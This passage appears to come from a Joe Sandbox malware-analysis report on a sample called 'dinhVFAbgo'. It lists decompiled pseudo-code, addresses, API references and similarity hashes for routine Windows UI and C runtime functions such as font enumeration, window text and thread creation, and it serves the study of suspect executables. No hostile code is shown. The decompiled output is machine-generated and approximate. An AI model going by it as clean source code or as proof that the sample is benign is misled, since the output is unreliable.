				struct HDC__* _t38;
				void* _t39;
				signed int _t43;

				_t32 = __edx;
				_t28 = __ebx;
				_t41 = _t43;
				_t11 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t11 ^ _t43;
				_push(__esi);
				_t37 = _a4;
				_push(__edi);
				E00DDFBE0(0,  &_v68, 0, 0x3c);
				if(_a4 == 0) {
					L2:
					E00CA4F80(_t28, _t29, 0, _t37, E00DEC84C( &(_v68.lfFaceName), 0x20, _t37));
					_v68.lfCharSet = 1;
					_v72 = 0;
					_t38 = GetDC(0);
					if(_t38 != 0) {
						EnumFontFamiliesExA(_t38,  &_v68, E00CC2DE2,  &_v72, 0);
						ReleaseDC(0, _t38);
					}
					_pop(_t35);
					_pop(_t39);
					return E00DDCBCE(_v72, _t28, _v8 ^ _t41, _t32, _t35, _t39);
				} else {
					_t25 = E00DEC1A0(_t37);
					_pop(_t29);
					if(_t25 >= 0x20) {
						E00CAA4E7(__ebx, _t29, 0, _t37, __eflags);
						asm("int3");
						return 0xe1ade8;
					} else {
						goto L2;
					}
				}
			}

0x00cc2df8
0x00cc2df8
0x00cc2df9
0x00cc2dfe
0x00cc2e05
0x00cc2e08
0x00cc2e09
0x00cc2e0f
0x00cc2e16
0x00cc2e20
0x00cc2e2e
0x00cc2e3b
0x00cc2e43
0x00cc2e47
0x00cc2e51
0x00cc2e55
0x00cc2e66
0x00cc2e6e
0x00cc2e6e
0x00cc2e7c
0x00cc2e7d
0x00cc2e84
0x00cc2e22
0x00cc2e23
0x00cc2e28
0x00cc2e2c
0x00cc2e85
0x00cc2e8a
0x00cc2e90
0x00000000
0x00000000
0x00000000
0x00cc2e2c

APIs

_strlen.LIBCMT ref: 00CC2E23
GetDC.USER32(00000000), ref: 00CC2E4B
EnumFontFamiliesExA.GDI32(00000000,00CBF63E,00CC2DE2,?,00000000), ref: 00CC2E66
ReleaseDC.USER32 ref: 00CC2E6E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EnumFamiliesFontRelease_strlen
String ID:
API String ID: 273584299-0
Opcode ID: 1dedc0ac4f94ba2111fb2fd625379d4e8e6ef1d874b35265d10714c4bcc5a567
Instruction ID: 2de76c14e731ef4247539128541ea64513153d9e4168e0a0e6adcdfb3d7c7ea2
Opcode Fuzzy Hash: 1dedc0ac4f94ba2111fb2fd625379d4e8e6ef1d874b35265d10714c4bcc5a567
Instruction Fuzzy Hash: EC11A572901218ABCB21EBA5DD49EEF77BCDF89B04F050059F802F7241DA64AE05C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00CCAA94 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00CCAA94(intOrPtr __ecx, signed int* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int* _v0;
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t42;
				signed int* _t43;
				signed int* _t45;
				intOrPtr _t46;
				void* _t47;
				void* _t50;
				void* _t53;
				void* _t55;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t60;
				void* _t63;
				void* _t71;
				signed int* _t74;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t87;
				signed int _t100;
				intOrPtr* _t101;
				void* _t103;
				void* _t105;
				signed int _t107;
				void* _t108;

				_t79 = __ecx;
				_push(__ecx);
				_t74 = _a4;
				_v8 = __ecx;
				_push(_t105);
				_push(_t100);
				if(_t74 == 0) {
					L6:
					E00CAA4E7(_t74, _t79, _t100, _t105, __eflags);
					asm("int3");
					_push(_t79);
					_push(_t74);
					_push(_t105);
					_push(_t100);
					_t101 = _t79 + 0x88;
					_v28 = _t79;
					_t42 =  *_t101;
					__eflags =  *(_t42 - 0xc);
					if( *(_t42 - 0xc) == 0) {
						_t43 = _v0;
						 *_t43 =  *_t43 & 0x00000000;
						__eflags =  *_t43;
						_t45 = _a4;
						 *_t45 =  *( *((intOrPtr*)(_t79 + 0x80)) - 0xc);
					} else {
						__eflags = _a12;
						_t107 = _a8;
						_t76 = 0x5f;
						if(_a12 == 0) {
							_t46 =  *((intOrPtr*)(_t79 + 0x80));
							while(1) {
								__eflags = _t107 -  *((intOrPtr*)(_t46 - 0xc));
								if(_t107 >=  *((intOrPtr*)(_t46 - 0xc))) {
									break;
								}
								_t47 = E00CAAF63(_t101, _t107);
								__eflags = _t47 - _t76;
								if(_t47 == _t76) {
									_t107 = _t107 + 1;
									__eflags = _t107;
									_t46 =  *((intOrPtr*)(_v12 + 0x80));
									continue;
								}
								break;
							}
							__eflags = _t107;
							if(_t107 == 0) {
								goto L36;
							} else {
								_t27 = _t107 - 1; // -1
								_v12 = _t27;
								_t50 = E00CAAF63(_t101, _t27);
								__eflags = _t50 - _t76;
								if(_t50 == _t76) {
									L31:
									 *_a4 = _t107;
									while(1) {
										_t107 = _t107 - 1;
										__eflags = _t107;
										if(_t107 <= 0) {
											break;
										}
										_t33 = _t107 - 1; // -2
										_t53 = E00CAAF63(_t101, _t33);
										__eflags = _t53 - _t76;
										if(_t53 == _t76) {
											continue;
										}
										break;
									}
									_t45 = _v0;
									goto L35;
								} else {
									while(1) {
										_t107 = _v12;
										__eflags = _t107;
										if(__eflags <= 0) {
											break;
										}
										_v12 = _t107 - 1;
										_t55 = E00CAAF63(_t101, _t107 - 1);
										__eflags = _t55 - _t76;
										if(_t55 != _t76) {
											continue;
										} else {
											__eflags = _t107;
										}
										break;
									}
									if(__eflags == 0) {
										goto L36;
									} else {
										goto L31;
									}
								}
							}
						} else {
							__eflags = _t107;
							if(_t107 > 0) {
								_push(_t107 - 1);
								while(1) {
									_t63 = E00CAAF63(_t101);
									__eflags = _t63 - _t76;
									if(_t63 != _t76) {
										goto L14;
									}
									_t107 = _t107 - 1;
									__eflags = _t107;
									if(_t107 > 0) {
										_push(_t107);
										continue;
									}
									goto L14;
								}
							}
							L14:
							_t57 =  *_t101;
							__eflags = _t107 -  *((intOrPtr*)(_t57 - 0xc));
							if(_t107 ==  *((intOrPtr*)(_t57 - 0xc))) {
								L36:
								 *_v0 =  *_v0 | 0xffffffff;
								_t45 = _a4;
								 *_t45 =  *_t45 & 0x00000000;
							} else {
								_t58 = E00CAAF63(_t101, _t107);
								__eflags = _t58 - _t76;
								if(_t58 == _t76) {
									L17:
									 *_v0 = _t107;
									_t87 =  *_t101;
									__eflags = _t107 -  *((intOrPtr*)(_t87 - 0xc));
									if(_t107 <  *((intOrPtr*)(_t87 - 0xc))) {
										while(1) {
											_t59 = E00CAAF63(_t101, _t107);
											__eflags = _t59 - _t76;
											if(_t59 != _t76) {
												goto L20;
											}
											_t60 =  *_t101;
											_t107 = _t107 + 1;
											__eflags = _t107 -  *((intOrPtr*)(_t60 - 0xc));
											if(_t107 <  *((intOrPtr*)(_t60 - 0xc))) {
												continue;
											}
											goto L20;
										}
									}
									L20:
									_t45 = _a4;
									L35:
									 *_t45 = _t107;
								} else {
									_t107 = E00CA9329(_t101, _t76, _t107);
									__eflags = _t107 - 0xffffffff;
									if(_t107 == 0xffffffff) {
										goto L36;
									} else {
										goto L17;
									}
								}
							}
						}
					}
					return _t45;
				} else {
					_t100 = _a8;
					if(_t100 == 0) {
						goto L6;
					} else {
						_t108 = __ecx + 0x84;
						_push(E00DEC1A0(_t74));
						E00CA2CD7(_t74, _t108, _t100, _t108, _t74);
						_t77 = _v8;
						_push(E00DEC1A0(_t100));
						E00CA2CD7(_t77, _t77 + 0x88, _t100, _t108, _t100);
						 *((char*)(_t77 + 0x8c)) = _a12;
						_push(E00DEC1A0(_t100));
						E00CA2CD7(_t77, _t77 + 0x80, _t100, _t108, _t100);
						_t109 = _a16;
						_t103 = _t77 + 0x90;
						if(_a16 == 0) {
							_t71 = E00CA2C0A(_t77, _t103);
						} else {
							_push(E00DEC1A0(_t109));
							_t71 = E00CA2CD7(_t77, _t103, _t103, _t109, _t109);
						}
						return _t71;
					}
				}
			}

0x00ccaa94
0x00ccaa97
0x00ccaa99
0x00ccaa9c
0x00ccaa9f
0x00ccaaa0
0x00ccaaa3
0x00ccab23
0x00ccab23
0x00ccab28
0x00ccab2c
0x00ccab2d
0x00ccab2e
0x00ccab2f
0x00ccab30
0x00ccab36
0x00ccab39
0x00ccab3b
0x00ccab3f
0x00ccac40
0x00ccac43
0x00ccac43
0x00ccac4f
0x00ccac52
0x00ccab45
0x00ccab45
0x00ccab49
0x00ccab4e
0x00ccab4f
0x00ccabbc
0x00ccabda
0x00ccabda
0x00ccabdd
0x00000000
0x00000000
0x00ccabc7
0x00ccabcc
0x00ccabce
0x00ccabd3
0x00ccabd3
0x00ccabd4
0x00000000
0x00ccabd4
0x00000000
0x00ccabce
0x00ccabdf
0x00ccabe1
0x00000000
0x00ccabe3
0x00ccabe3
0x00ccabe9
0x00ccabec
0x00ccabf1
0x00ccabf3
0x00ccac12
0x00ccac15
0x00ccac17
0x00ccac17
0x00ccac18
0x00ccac1a
0x00000000
0x00000000
0x00ccac1c
0x00ccac22
0x00ccac27
0x00ccac29
0x00000000
0x00000000
0x00000000
0x00ccac29
0x00ccac2b
0x00000000
0x00ccabf5
0x00ccabf5
0x00ccabf5
0x00ccabf8
0x00ccabfa
0x00000000
0x00000000
0x00ccac02
0x00ccac05
0x00ccac0a
0x00ccac0c
0x00000000
0x00ccac0e
0x00ccac0e
0x00ccac0e
0x00000000
0x00ccac0c
0x00ccac10
0x00000000
0x00000000
0x00000000
0x00000000
0x00ccac10
0x00ccabf3
0x00ccab51
0x00ccab51
0x00ccab53
0x00ccab58
0x00ccab61
0x00ccab63
0x00ccab68
0x00ccab6a
0x00000000
0x00000000
0x00ccab5b
0x00ccab5c
0x00ccab5e
0x00ccab60
0x00000000
0x00ccab60
0x00000000
0x00ccab5e
0x00ccab61
0x00ccab6c
0x00ccab6c
0x00ccab6e
0x00ccab71
0x00ccac32
0x00ccac35
0x00ccac38
0x00ccac3b
0x00ccab77
0x00ccab7a
0x00ccab7f
0x00ccab81
0x00ccab97
0x00ccab9a
0x00ccab9c
0x00ccab9e
0x00ccaba1
0x00ccaba3
0x00ccaba6
0x00ccabab
0x00ccabad
0x00000000
0x00000000
0x00ccabaf
0x00ccabb1
0x00ccabb2
0x00ccabb5
0x00000000
0x00000000
0x00000000
0x00ccabb5
0x00ccaba3
0x00ccabb7
0x00ccabb7
0x00ccac2e
0x00ccac2e
0x00ccab83
0x00ccab8c
0x00ccab8e
0x00ccab91
0x00000000
0x00000000
0x00000000
0x00000000
0x00ccab91
0x00ccab81
0x00ccab71
0x00ccab4f
0x00ccac58
0x00ccaaa5
0x00ccaaa5
0x00ccaaaa
0x00000000
0x00ccaaac
0x00ccaaad
0x00ccaab9
0x00ccaabd
0x00ccaac2
0x00ccaacc
0x00ccaad4
0x00ccaadd
0x00ccaae9
0x00ccaaf1
0x00ccaaf6
0x00ccaaf9
0x00ccab01
0x00ccab1c
0x00ccab03
0x00ccab0a
0x00ccab0e
0x00ccab0e
0x00ccab17
0x00ccab17
0x00ccaaaa

APIs

_strlen.LIBCMT ref: 00CCAAB3
_strlen.LIBCMT ref: 00CCAAC6
_strlen.LIBCMT ref: 00CCAAE3
_strlen.LIBCMT ref: 00CCAB04

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: b958eec62c52454b9daf075e585adaf6fe4994fee58ad6377796c9a5524367ac
Instruction ID: 719a7bf01f367cb7b26be136adf5734551056fbc5a9c9a978791c51e9bb71067
Opcode Fuzzy Hash: b958eec62c52454b9daf075e585adaf6fe4994fee58ad6377796c9a5524367ac
Instruction Fuzzy Hash: 7E01C4722001696BEB04BA59D886EBF332DEF92728F14402DFE169B103DE706D069771

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2F76 Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00CE2F76(void* __ebx, intOrPtr* __ecx, struct tagPOINT* __edx, intOrPtr _a4) {
				struct tagPOINT _v12;
				int _t25;
				void* _t36;
				intOrPtr* _t40;
				struct tagPOINT* _t45;
				intOrPtr* _t47;
				void* _t49;

				_t45 = __edx;
				_t36 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_v12.x = _v12.x & 0x00000000;
				_v12.y = _v12.y & 0x00000000;
				_t47 = __ecx;
				GetCursorPos( &_v12);
				_t25 = E00CE57B6(_t47, _t45);
				if(_a4 != 0) {
					_t45 = _t47 + 0x168;
					_t45->x = _v12.x;
					_t45->y = _v12.y;
					_t25 = ScreenToClient( *(_t47 + 0x20), _t45);
				}
				if( *((char*)(_t47 + 0x170)) == 0) {
					 *0xe17a64(_t49);
					_t40 = _t47;
					_t25 =  *((intOrPtr*)( *((intOrPtr*)( *_t47 + 0x168))))();
					if(_t25 != 0) {
						E00CB277F(_t36, _t40, _t45, SetCapture( *(_t47 + 0x20)));
						 *(_t47 + 0x190) = _v12.x;
						 *(_t47 + 0x194) = _v12.y;
						 *((char*)(_t47 + 0x170)) = 1;
						 *0xe17a64(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t47 + 0x30c))))();
						_t25 = GetWindowRect( *(_t47 + 0x20), _t47 + 0x150);
					}
				}
				return _t25;
			}

0x00ce2f76
0x00ce2f76
0x00ce2f79
0x00ce2f7a
0x00ce2f7b
0x00ce2f82
0x00ce2f88
0x00ce2f8a
0x00ce2f92
0x00ce2f9b
0x00ce2fa0
0x00ce2fad
0x00ce2faf
0x00ce2fb2
0x00ce2fb2
0x00ce2fbf
0x00ce2fcc
0x00ce2fd2
0x00ce2fd4
0x00ce2fd8
0x00ce2fe4
0x00ce2fef
0x00ce2ff7
0x00ce2fff
0x00ce300e
0x00ce3016
0x00ce3022
0x00ce3022
0x00ce3028
0x00ce302b

APIs

GetCursorPos.USER32(00000000), ref: 00CE2F8A

Part of subcall function 00CE57B6: GetWindowRect.USER32 ref: 00CE57CA
Part of subcall function 00CE57B6: GetParent.USER32(?), ref: 00CE5820
Part of subcall function 00CE57B6: GetParent.USER32(?), ref: 00CE5833

ScreenToClient.USER32 ref: 00CE2FB2
SetCapture.USER32(?), ref: 00CE2FDD
GetWindowRect.USER32 ref: 00CE3022

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ParentRectWindow$CaptureClientCursorScreen
String ID:
API String ID: 3234571238-0
Opcode ID: 5e164cdd62633ca1c0ce29e1ff95ccd0a7699f8617d570a92a1610129f8a8fda
Instruction ID: 4aeefd4961c1bab0a8e4ca819bf17c007d90fe081a88e75fa87856601cbc023b
Opcode Fuzzy Hash: 5e164cdd62633ca1c0ce29e1ff95ccd0a7699f8617d570a92a1610129f8a8fda
Instruction Fuzzy Hash: 2C21A971604605EFDB09DF65C848BEDBBBAFF88301F044299E809A7390DB74AA54CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2D5B Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00CB2D5B(void* __ebx, void* __edx, struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				signed int _v8;
				long _v16;
				void _v20;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t12;
				intOrPtr _t14;
				long _t18;
				void* _t22;
				struct HWND__* _t23;
				void* _t26;
				void* _t27;
				struct HDC__* _t28;
				signed int _t29;

				_t26 = __edx;
				_t22 = __ebx;
				_t10 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t10 ^ _t29;
				_t23 = _a8;
				_t28 = _a4;
				_t27 = _a16;
				if(_t28 == 0 || _t27 == 0) {
					L10:
					_t12 = 0;
				} else {
					_t14 = _a12;
					if(_t14 == 1 || _t14 == 0 || _t14 == 5 || _t14 == 2 && E00CB8636(_t23, _t14) == 0) {
						goto L10;
					} else {
						GetObjectA(_t27, 0xc,  &_v20);
						SetBkColor(_t28, _v16);
						_t18 = _a20;
						if(_t18 == 0xffffffff) {
							_t18 = GetSysColor(8);
						}
						SetTextColor(_t28, _t18);
						_t12 = 1;
					}
				}
				return E00DDCBCE(_t12, _t22, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x00cb2d5b
0x00cb2d5b
0x00cb2d61
0x00cb2d68
0x00cb2d6b
0x00cb2d6f
0x00cb2d73
0x00cb2d78
0x00cb2dd3
0x00cb2dd3
0x00cb2d7e
0x00cb2d7e
0x00cb2d84
0x00000000
0x00cb2d9f
0x00cb2da6
0x00cb2db0
0x00cb2db6
0x00cb2dbc
0x00cb2dc0
0x00cb2dc0
0x00cb2dc8
0x00cb2dd0
0x00cb2dd0
0x00cb2d84
0x00cb2de2

APIs

GetObjectA.GDI32(?,0000000C,?), ref: 00CB2DA6
SetBkColor.GDI32(?,?), ref: 00CB2DB0
GetSysColor.USER32(00000008), ref: 00CB2DC0
SetTextColor.GDI32(?,?), ref: 00CB2DC8

Part of subcall function 00CB8636: GetWindowLongA.USER32 ref: 00CB8651
Part of subcall function 00CB8636: GetClassNameA.USER32(?,?,0000000A), ref: 00CB8666
Part of subcall function 00CB8636: CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00CB867D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Color$ClassCompareLongNameObjectStringTextWindow
String ID:
API String ID: 3274569906-0
Opcode ID: 96bcdb2abc39d107352a19eb55abf1a9e02e6dd43dbf25423581e2cdba069860
Instruction ID: bdba8dff8f1982d86bf5e531b9daf63d0fd08b02c624ea7a886452b47807ccec
Opcode Fuzzy Hash: 96bcdb2abc39d107352a19eb55abf1a9e02e6dd43dbf25423581e2cdba069860
Instruction Fuzzy Hash: 8E01A932600528AF8B60EF79CC449EF33B8EB49790F144555F921E2180CB30DA41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DEC08F Relevance: 6.1, APIs: 4, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00DEC08F(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				long _v12;
				long _t18;
				void* _t29;
				void* _t30;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_t35 = _a4;
				if(_a4 != 0) {
					_push(_t29);
					_t33 = E00DEC03F(__ecx, __eflags, _a4, _a12);
					_v8 = _t33;
					__eflags = _t33;
					if(_t33 == 0) {
						L5:
						_t30 = _t29 | 0xffffffff;
						__eflags = _t30;
					} else {
						_v12 = _v12 & 0x00000000;
						_t29 = CreateThread(0, _a8, 0xdebf31, _t33, 4,  &_v12);
						__eflags = _t29;
						if(_t29 != 0) {
							 *(_t33 + 8) = _t29;
							_t18 = ResumeThread(_t29);
							__eflags = _t18 - 0xffffffff;
							if(_t18 == 0xffffffff) {
								goto L4;
							} else {
								_v8 = _v8 & 0x00000000;
							}
						} else {
							L4:
							E00DE5884(GetLastError());
							goto L5;
						}
					}
					E00DEBFB1( &_v8);
					return _t30;
				} else {
					 *((intOrPtr*)(E00DE58BA(_t35))) = 0x16;
					return E00DE231A() | 0xffffffff;
				}
			}

0x00dec094
0x00dec095
0x00dec096
0x00dec09a
0x00dec0b2
0x00dec0be
0x00dec0c0
0x00dec0c5
0x00dec0c7
0x00dec0f7
0x00dec0f7
0x00dec0f7
0x00dec0c9
0x00dec0c9
0x00dec0e4
0x00dec0e6
0x00dec0e8
0x00dec109
0x00dec10c
0x00dec112
0x00dec115
0x00000000
0x00dec117
0x00dec117
0x00dec117
0x00dec0ea
0x00dec0ea
0x00dec0f1
0x00000000
0x00dec0f6
0x00dec0e8
0x00dec0fd
0x00dec107
0x00dec09c
0x00dec0a1
0x00dec0b0
0x00dec0b0

APIs

CreateThread.KERNEL32 ref: 00DEC0DE
GetLastError.KERNEL32(?,?,?,00D8134D,00D8139C,00000000,00000000,?,?,?,00CF6EB3,00000001), ref: 00DEC0EA
__dosmaperr.LIBCMT ref: 00DEC0F1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 12c1e131de9a8f81c9b106c8e788ad81e9689c896fe4b25a863971a7cefd4389
Instruction ID: 2cefbbc9069497886cfffc910a9a9392f8f0a5ef6e4c5b6e152e0e2a463e168f
Opcode Fuzzy Hash: 12c1e131de9a8f81c9b106c8e788ad81e9689c896fe4b25a863971a7cefd4389
Instruction Fuzzy Hash: 3B010032410284EFDB11BF6ADC09B9EBA69EF807B5F248219F521920D0DB708946CA70

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8416 Relevance: 6.1, APIs: 4, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00CB8416(void* __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				intOrPtr* _v36;
				char _v264;
				signed int* _v268;
				signed int* _v272;
				signed int _v284;
				signed int* _v308;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t22;
				signed int* _t24;
				signed int _t28;
				void* _t45;
				signed int* _t46;
				void* _t47;
				void* _t48;
				void* _t56;
				struct HWND__* _t58;
				signed int _t59;
				signed int _t60;
				void* _t61;
				CHAR* _t62;
				struct HINSTANCE__* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;

				_t56 = __edx;
				_t19 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t19 ^ _t64;
				_t62 = _a8;
				_t58 = _a4;
				if(_t58 == 0 || _t62 == 0) {
					E00CAA4E7(_t45, _t48, _t58, _t62, __eflags);
					asm("int3");
					_push(_t64);
					_t65 = _t66;
					_t22 =  *0xe68dd4; // 0x8d2643c2
					_v284 = _t22 ^ _t65;
					_t24 = _v268;
					_push(_t45);
					_t46 = _v272;
					_push(_t62);
					_push(L"comctl32.dll");
					_v308 = _t24;
					 *_t46 =  *_t46 & 0x00000000;
					 *_t24 =  *_t24 & 0x00000000;
					_t63 = E00CB73F8(_t46, _t48, _t58, _t62, __eflags);
					__eflags = _t63;
					if(_t63 != 0) {
						_push(_t58);
						_t59 = GetProcAddress(_t63, "DllGetVersion");
						__eflags = _t59;
						if(_t59 == 0) {
							_t60 = 0x80004001;
						} else {
							E00DDFBE0(_t59,  &_v32, 0, 0x14);
							_v32 = 0x14;
							 *0xe17a64( &_v32);
							_t60 =  *_t59();
							__eflags = _t60;
							if(_t60 >= 0) {
								 *_t46 = _v28;
								 *_v36 = _v24;
							}
						}
						FreeLibrary(_t63);
						_t28 = _t60;
						_pop(_t58);
					} else {
						_t28 = E00CABB63();
					}
					__eflags = _v12 ^ _t65;
					return E00DDCBCE(_t28, _t46, _v12 ^ _t65, _t56, _t58, _t63);
				} else {
					_t47 = E00DEC1A0(_t62);
					 *_t66 = 0x100;
					_push(0);
					_push( &_v264);
					E00DDFBE0(_t58);
					if(_t47 > 0x100 || GetWindowTextA(_t58,  &_v264, 0x100) != _t47 || lstrcmpA( &_v264, _t62) != 0) {
						_t40 = SetWindowTextA(_t58, _t62);
					}
					_pop(_t61);
					return E00DDCBCE(_t40, _t47, _v8 ^ _t64, _t56, _t61, _t62);
				}
			}

0x00cb8416
0x00cb841f
0x00cb8426
0x00cb842b
0x00cb842f
0x00cb8434
0x00cb84a1
0x00cb84a6
0x00cb84a7
0x00cb84a8
0x00cb84ad
0x00cb84b4
0x00cb84b7
0x00cb84ba
0x00cb84bb
0x00cb84be
0x00cb84bf
0x00cb84c4
0x00cb84c7
0x00cb84ca
0x00cb84d2
0x00cb84d4
0x00cb84d6
0x00cb84df
0x00cb84ec
0x00cb84ee
0x00cb84f0
0x00cb852c
0x00cb84f2
0x00cb84fa
0x00cb8502
0x00cb850f
0x00cb8517
0x00cb8519
0x00cb851b
0x00cb8523
0x00cb8528
0x00cb8528
0x00cb851b
0x00cb8532
0x00cb8538
0x00cb853a
0x00cb84d8
0x00cb84d8
0x00cb84d8
0x00cb853f
0x00cb8548
0x00cb843a
0x00cb8440
0x00cb8442
0x00cb844f
0x00cb8451
0x00cb8452
0x00cb8461
0x00cb848a
0x00cb848a
0x00cb8493
0x00cb849e
0x00cb849e

APIs

_strlen.LIBCMT ref: 00CB843B
GetWindowTextA.USER32 ref: 00CB846C
lstrcmpA.KERNEL32(?,00CB050B,?,00000000), ref: 00CB847E
SetWindowTextA.USER32(?,00CB050B), ref: 00CB848A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: TextWindow$_strlenlstrcmp
String ID:
API String ID: 3731183236-0
Opcode ID: 1fbb2705a9a7db3af802f3b830efb2a258b345508bdeacd5b1cea67c6ebcd6ca
Instruction ID: 70609ae2ccd39da2197388c803a07533895d56b659e1fa4f9f5aa122473616f3
